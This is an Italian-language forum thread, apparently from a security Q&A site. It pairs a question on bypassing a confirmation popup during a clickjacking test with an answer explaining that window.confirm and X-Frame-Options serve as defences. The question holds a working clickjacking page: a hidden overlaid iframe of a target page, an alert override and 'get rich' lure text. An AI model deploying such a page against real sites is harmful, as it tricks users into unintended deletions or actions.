Come nascondere il pop-up della vittima nel clickjacking?

2

Sto testando un'applicazione Web per la vulnerabilità di click-jacking. L'attacco funziona bene per singoli clic, tuttavia sto cercando di eliminare un file e il frame nascosto (vittima) genera una conferma a comparsa.

C'è un modo per nascondere il popup (lo stesso del fotogramma) e indurre l'utente ad accettarlo. Ho cercato su Google molto ma senza fortuna: (

Anche i buster dei frame busting non funzionano.

Aiutatemi, grazie

Sto facendo qualcosa di sbagliato Codice pagina click-jacking:

<html>
<body>
<script>
window.alert = function() { return false; }
</script>

<script>
window.onbeforeunload = function()
{
    return "Maybe you want to leave the page, before you become rich??";
}
</script>
<style>
iframe { 
  width:100%;
  height:100%;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>
<div>Click on the link to get rich now:</div>

<iframe src="https://xyz.com/Forms/AllItems.aspx"></iframe><ahref="https://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be rich for the whole life!</div>
</body>
</html>
    
posta AJINKYA 19.04.2013 - 13:43
fonte

1 risposta

2

L'utilizzo di window.confirm () è un metodo valido per mitigare il Clickjacking quando non è possibile utilizzare x-frame-options . Questa finestra popup non può essere inquadrata. In ogni browser ad eccezione di Internet Explorer viene visualizzata l'origine della finestra di conferma se il dominio differisce dall'iframe principale nel popup a causa di Clickjacking. L'uso di window.confirm () come metodo di difesa contro il clickjacking è stato utilizzato da Google.

L'uso delle opzioni x-frame è ancora un metodo migliore che impedisce il clickjacking, tuttavia ci sono alcuni casi in cui non può essere usato. Ad esempio, non tutti i browser supportano la funzionalità di whitelist e talvolta i siti richiedono una whitelist molto ampia.

    
risposta data 13.05.2013 - 21:07
fonte

Leggi altre domande sui tag